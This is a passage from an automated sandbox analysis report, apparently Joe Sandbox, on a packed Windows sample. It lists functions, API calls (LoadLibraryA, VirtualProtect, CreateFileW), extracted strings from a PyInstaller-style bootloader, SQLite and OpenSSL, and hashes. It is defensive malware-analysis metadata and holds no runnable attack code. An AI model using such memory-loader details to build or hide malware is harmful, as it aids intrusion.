GET , xrefs: 00007FFDFAAFB8E8
POST , xrefs: 00007FFDFAAFB90B
HEAD , xrefs: 00007FFDFAAFB929
PUT , xrefs: 00007FFDFAAFB943

Memory Dump Source

Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true

Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd

Similarity

API ID:
String ID: $..\s\ssl\record\ssl3_record.c$CONNE$GET $HEAD $POST $PUT $ssl3_get_record
API String ID: 0-2781224710
Opcode ID: b400293baa34000780f5a339118ca863fb8810f07702305baec27cbd6e082666
Instruction ID: 95b3f3bddc84236b192caf630ae2ce91a3faca7ee34022f569e35d54b07e539a
Opcode Fuzzy Hash: b400293baa34000780f5a339118ca863fb8810f07702305baec27cbd6e082666
Instruction Fuzzy Hash: B2826A21B09B8285FB6CAB21D460BB933A1EF41784F9440B6DE6D476DDDF3CE54A8311

Function 00007FFDFB0D92B0 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 513
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

00007FFE13343010.VCRUNTIME140 ref: 00007FFDFB0D937F
00007FFE13343010.VCRUNTIME140 ref: 00007FFDFB0D945E
00007FFE13343010.VCRUNTIME140 ref: 00007FFDFB0D9480
00007FFE13343010.VCRUNTIME140 ref: 00007FFDFB0D963E
00007FFE13343010.VCRUNTIME140 ref: 00007FFDFB0D9667

Strings

nolock, xrefs: 00007FFDFB0D97C5
-journal, xrefs: 00007FFDFB0D9646
immutable, xrefs: 00007FFDFB0D97FD

Memory Dump Source

Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true

Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd

Similarity

API ID: 00007E13343010
String ID: -journal$immutable$nolock
API String ID: 2142204133-4201244970
Opcode ID: e71367e4caff7898d8f729e26418474fc89d99c24193eae94bfbfe729bf6114b
Instruction ID: 2a9091ee9a96360e57c26c2fa3c70e94a5402815e56ef6d30e280918ea0e5405
Opcode Fuzzy Hash: e71367e4caff7898d8f729e26418474fc89d99c24193eae94bfbfe729bf6114b
Instruction Fuzzy Hash: 6D326E22B0A7838AEB658F25D460B793791FB4AB94F484234DA6E477E8DF3CE455D300

Function 00007FF6BA3C6964 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6BA3C6698: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3C66D9
Part of subcall function 00007FF6BA3C6698: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3C6757
Part of subcall function 00007FF6BA3C6698: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3C67A8

CreateFileW.KERNEL32 ref: 00007FF6BA3C6A6A
CreateFileW.KERNEL32 ref: 00007FF6BA3C6ABA
GetLastError.KERNEL32 ref: 00007FF6BA3C6AEA
GetFileType.KERNEL32 ref: 00007FF6BA3C6AFF
GetLastError.KERNEL32 ref: 00007FF6BA3C6B09
CloseHandle.KERNEL32 ref: 00007FF6BA3C6B3C
CloseHandle.KERNEL32 ref: 00007FF6BA3C6C9F
CreateFileW.KERNEL32 ref: 00007FF6BA3C6CD4
GetLastError.KERNEL32 ref: 00007FF6BA3C6CE3

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
Instruction ID: d2f1252c068806c6d85274bc4632117b0a975a79953561aa522fd67421a244c7
Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
Instruction Fuzzy Hash: 40C1CF36B28B5286EB10CFA9C8906AC3B61FB49B98B415275DF1ED7795EF38D491C300

Function 00007FFDFB089060 Relevance: 9.6, APIs: 4, Strings: 1, Instructions: 850librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FFDFB089B20
GetProcAddress.KERNEL32 ref: 00007FFDFB089B4A
VirtualProtect.KERNEL32(?,?,?,00000000), ref: 00007FFDFB089BD4
VirtualProtect.KERNEL32 ref: 00007FFDFB089BF2

Strings

)tP, xrefs: 00007FFDFB08908B

Memory Dump Source

Source File: 00000001.00000002.2257482350.00007FFDFB089000.00000080.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAB80000, based on PE: true

Associated: 00000001.00000002.2255962872.00007FFDFAB80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2256002845.00007FFDFAB81000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2256002845.00007FFDFAB92000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2256002845.00007FFDFABA2000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2256002845.00007FFDFABA8000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2256002845.00007FFDFABF2000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2256002845.00007FFDFAC07000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2256002845.00007FFDFAC17000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2256002845.00007FFDFAC1E000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2256002845.00007FFDFAC2C000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2256002845.00007FFDFAE0E000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2256002845.00007FFDFAEF9000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2256002845.00007FFDFAEFB000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2256002845.00007FFDFAF32000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2256002845.00007FFDFAF6F000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2256002845.00007FFDFAFCA000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2256002845.00007FFDFB03B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2256002845.00007FFDFB070000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2256002845.00007FFDFB083000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.2257515754.00007FFDFB08A000.00000004.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfab80000_El9HaBFrFM.jbxd

Similarity

API ID: ProtectVirtual$AddressLibraryLoadProc
String ID: )tP
API String ID: 3300690313-3907340667
Opcode ID: eab163715ab1799b633ac6e81f81b77985ed928b0291ff377fca493afee617fe
Instruction ID: 1ae45ece0e0a485ce9dc5faf4910d6ecee2e4b7ba2a6ac706bf570bfad1e080e
Opcode Fuzzy Hash: eab163715ab1799b633ac6e81f81b77985ed928b0291ff377fca493afee617fe
Instruction Fuzzy Hash: 0E62582272999286E715DF38D4106BD7790F749386F04A531EAAEC37D8EA3CEB44DB00

Function 00007FFDFB144C70 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 370
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

00007FFE13343010.VCRUNTIME140 ref: 00007FFDFB144EFD
00007FFE13343010.VCRUNTIME140 ref: 00007FFDFB144FAE

Strings

out of memory, xrefs: 00007FFDFB144D5F
statement too long, xrefs: 00007FFDFB144EB3
database schema is locked: %s, xrefs: 00007FFDFB144E56

Memory Dump Source

Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true

Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd

Similarity

API ID: 00007E13343010
String ID: database schema is locked: %s$out of memory$statement too long
API String ID: 2142204133-1046679716
Opcode ID: 7f23d50979c88e00e17b4a476aebd8052426b92c118e75aeb5a3e9824675a78a
Instruction ID: 5f1ed2cf7854032140295e853257be1f4e8840fdc1ac63dfef037a0e430abe56
Opcode Fuzzy Hash: 7f23d50979c88e00e17b4a476aebd8052426b92c118e75aeb5a3e9824675a78a
Instruction Fuzzy Hash: B3F17123F0A683C6EB258F259424BBA6B90FB46B48F084135DA6D077EDDF7CE6508740

Function 00007FFDFA9E0350 Relevance: 6.9, APIs: 4, Instructions: 885librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FFDFA9E0E65
GetProcAddress.KERNEL32 ref: 00007FFDFA9E0E83
VirtualProtect.KERNEL32(?,?,?,00000000), ref: 00007FFDFA9E0F03
VirtualProtect.KERNEL32 ref: 00007FFDFA9E0F21

Memory Dump Source

Source File: 00000001.00000002.2255290926.00007FFDFA9E0000.00000080.00000001.01000000.00000013.sdmp, Offset: 00007FFDFA930000, based on PE: true

Associated: 00000001.00000002.2254926278.00007FFDFA930000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2254958100.00007FFDFA931000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2254958100.00007FFDFA97A000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2254958100.00007FFDFA988000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2254958100.00007FFDFA9D7000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2254958100.00007FFDFA9DC000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2254958100.00007FFDFA9DF000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000001.00000002.2255326893.00007FFDFA9E2000.00000004.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfa930000_El9HaBFrFM.jbxd

Similarity

API ID: ProtectVirtual$AddressLibraryLoadProc
String ID:
API String ID: 3300690313-0
Opcode ID: 6f314cbc243d0361b81c21546ac629a958ec6804df8a06217d551e75d8bff2aa
Instruction ID: f708a7ead3872cebc14767bbb6c7a1c563da75f74a967b7d3400e12b77275a50
Opcode Fuzzy Hash: 6f314cbc243d0361b81c21546ac629a958ec6804df8a06217d551e75d8bff2aa
Instruction Fuzzy Hash: 3962062271829286E7198B38D4907B977E0F748785F845535EAAEC37C9EA3CEE45CB10

Function 00007FFDFB0E2250 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 586COMMON

Download Yara Rule

APIs

00007FFE13343010.VCRUNTIME140 ref: 00007FFDFB0E2403

Strings

:memory:, xrefs: 00007FFDFB0E22BD

Memory Dump Source

Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true

Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd

Similarity

API ID: 00007E13343010
String ID: :memory:
API String ID: 2142204133-2920599690
Opcode ID: 5d158ba6bdcfd1d67072cc4d23b95b7b5ae2ced07bbb9c01723f0e9ed9192fff
Instruction ID: 36cf7ce6ba532f3282d16ad89b1e65c377a4700778bee790394a7c93efad0d33
Opcode Fuzzy Hash: 5d158ba6bdcfd1d67072cc4d23b95b7b5ae2ced07bbb9c01723f0e9ed9192fff
Instruction Fuzzy Hash: 55427F62B0A78786FB25AB259560B7967A0FF46B84F044135DE6D837F8DF3CE8949300

Function 00007FF6BA3A9280 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 00007FF6BA3A92B3
FindClose.KERNEL32 ref: 00007FF6BA3A92C2

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
Instruction ID: 1227d9f2ab5e5c76a0d82599c0af93e2b57c6a6d221941aecb0d24f7cfe87dc5
Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
Instruction Fuzzy Hash: 97F0C822A1874586FB608F68F49876E7790AB84364F040335DFAED26D4DF3CD048CB00

Function 00007FFDFB0D1230 Relevance: 1.7, APIs: 1, Instructions: 204COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32 ref: 00007FFDFB0D1255

Memory Dump Source

Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true

Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 0609f6becf4837133f86ac5623d419228c70d3b405efdb4a8828f98acc38b35e
Instruction ID: 6de061bb28b1c28eb81710457d69f78760ddcac9f73fd9d2dd56c33a1b411327
Opcode Fuzzy Hash: 0609f6becf4837133f86ac5623d419228c70d3b405efdb4a8828f98acc38b35e
Instruction Fuzzy Hash: 4CA1C521B0FB4785FF588B45A874A7422A0BF4AB44F944635ED2EC67F8DF6CE8919340

Function 00007FF6BA3A1950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6BA3A7F90: _fread_nolock.LIBCMT ref: 00007FF6BA3A803A

_fread_nolock.LIBCMT ref: 00007FF6BA3A1A1B

Part of subcall function 00007FF6BA3A2910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6BA3A1B6A), ref: 00007FF6BA3A295E

Strings

Failed to read cookie!, xrefs: 00007FF6BA3A1A2B
Could not allocate buffer for TOC!, xrefs: 00007FF6BA3A1B1B
malloc, xrefs: 00007FF6BA3A1B22
Could not read full TOC!, xrefs: 00007FF6BA3A1B55
Error on file., xrefs: 00007FF6BA3A1B8D
fseek, xrefs: 00007FF6BA3A19F5
calloc, xrefs: 00007FF6BA3A1A68
fread, xrefs: 00007FF6BA3A1A32, 00007FF6BA3A1B5C
Could not allocate memory for archive structure!, xrefs: 00007FF6BA3A1A61
MEI, xrefs: 00007FF6BA3A1991
Failed to seek to cookie position!, xrefs: 00007FF6BA3A19EE

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: _fread_nolock$CurrentProcess
String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
API String ID: 2397952137-3497178890
Opcode ID: 3ff95809ca1090418fbd1d21d944a3955d2264a87fb5bf50133219bb90c93b1a
Instruction ID: 0f13b9b46475006238ca34a1eb1ae64f015f556f94893fcc7f2a56475438f961
Opcode Fuzzy Hash: 3ff95809ca1090418fbd1d21d944a3955d2264a87fb5bf50133219bb90c93b1a
Instruction Fuzzy Hash: 0A819471A0CA9686EF60DB2CD4402BD63A2EF44784F444576EF8DC7796EE3CE5858740

Function 00007FF6BA3A1470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

malloc, xrefs: 00007FF6BA3A151F
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF6BA3A1518
Failed to extract %s: failed to open archive file!, xrefs: 00007FF6BA3A149F
fseek, xrefs: 00007FF6BA3A14E5
fread, xrefs: 00007FF6BA3A15E6
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6BA3A14DE
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6BA3A15DF

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: 55660f7852eeee30d2d639831c2873b2ebe9c995d45b3204146c46c5ee4e8cf5
Instruction ID: 2dbd0267bc39c503077323a437b2cc46c28bb447a4b7e5bcb654a26f015fb296
Opcode Fuzzy Hash: 55660f7852eeee30d2d639831c2873b2ebe9c995d45b3204146c46c5ee4e8cf5
Instruction Fuzzy Hash: E3419D32A08AA686EF10DF29E8401B96392FF44784F8445B2EF4DC7B95EE3CE5418704

Function 00007FFDFB1443D0 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 334
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

00007FFE13343010.VCRUNTIME140 ref: 00007FFDFB144559

Strings

CREATE TABLE x(type text,name text,tbl_name text,rootpage int,sql text), xrefs: 00007FFDFB144474
table, xrefs: 00007FFDFB1443FA
SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 00007FFDFB14474F
sqlite_master, xrefs: 00007FFDFB14441C
sqlite_temp_master, xrefs: 00007FFDFB144415
ase, xrefs: 00007FFDFB14465D

Memory Dump Source

Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true

Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd

Similarity

API ID: 00007E13343010
String ID: CREATE TABLE x(type text,name text,tbl_name text,rootpage int,sql text)$SELECT*FROM"%w".%s ORDER BY rowid$ase$sqlite_master$sqlite_temp_master$table
API String ID: 2142204133-879093740
Opcode ID: f9f91cf4c879a1f55dcf4b3cc1e56045de927a81096d4cf94589e99b2d0e2aef
Instruction ID: 4b7956135e2544d636c72710755c00eed736ebee825b9fcaaf264eae68240ff6
Opcode Fuzzy Hash: f9f91cf4c879a1f55dcf4b3cc1e56045de927a81096d4cf94589e99b2d0e2aef
Instruction Fuzzy Hash: 7EE1AB63F0A69386FB10CB648460AB927A5FB46B88F154235DE2C177EDDF38E562C340

Function 00007FF6BA3A1210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF6BA3A12BA
malloc, xrefs: 00007FF6BA3A12C1, 00007FF6BA3A12F6
1.3.1, xrefs: 00007FF6BA3A1249
Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF6BA3A1276
Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF6BA3A141E
Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF6BA3A12EF

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd

Similarity

API ID: CurrentProcess
String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2050909247-2813020118
Opcode ID: 750117d0cef1200f284b8f46e1dc9bb692c8931361e04233996456fa0167cff0
Instruction ID: e7e218bea623bde61708f427b7fcd7b4368cbd96e1b0d49f00024d598f8a602f
Opcode Fuzzy Hash: 750117d0cef1200f284b8f46e1dc9bb692c8931361e04233996456fa0167cff0
Instruction Fuzzy Hash: 5551E322A08A6681EE60AF19E4503BE6292FF85794F844276EF4DC7BD5EF3CE541C700

Function 00007FF6BA3A36B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,00007FF6BA3A3804), ref: 00007FF6BA3A36E1
GetLastError.KERNEL32(?,00007FF6BA3A3804), ref: 00007FF6BA3A36EB

Part of subcall function 00007FF6BA3A2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6BA3A3706,?,00007FF6BA3A3804), ref: 00007FF6BA3A2C9E
Part of subcall function 00007FF6BA3A2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6BA3A3706,?,00007FF6BA3A3804), ref: 00007FF6BA3A2D63
Part of subcall function 00007FF6BA3A2C50: MessageBoxW.USER32 ref: 00007FF6BA3A2D99

Strings

Failed to convert executable path to UTF-8., xrefs: 00007FF6BA3A3790
Failed to obtain executable path., xrefs: 00007FF6BA3A36F3
GetModuleFileNameW, xrefs: 00007FF6BA3A36FA
Failed to resolve full path to executable %ls., xrefs: 00007FF6BA3A3739
\\?\, xrefs: 00007FF6BA3A375A

Memory Dump Source

Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true

Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
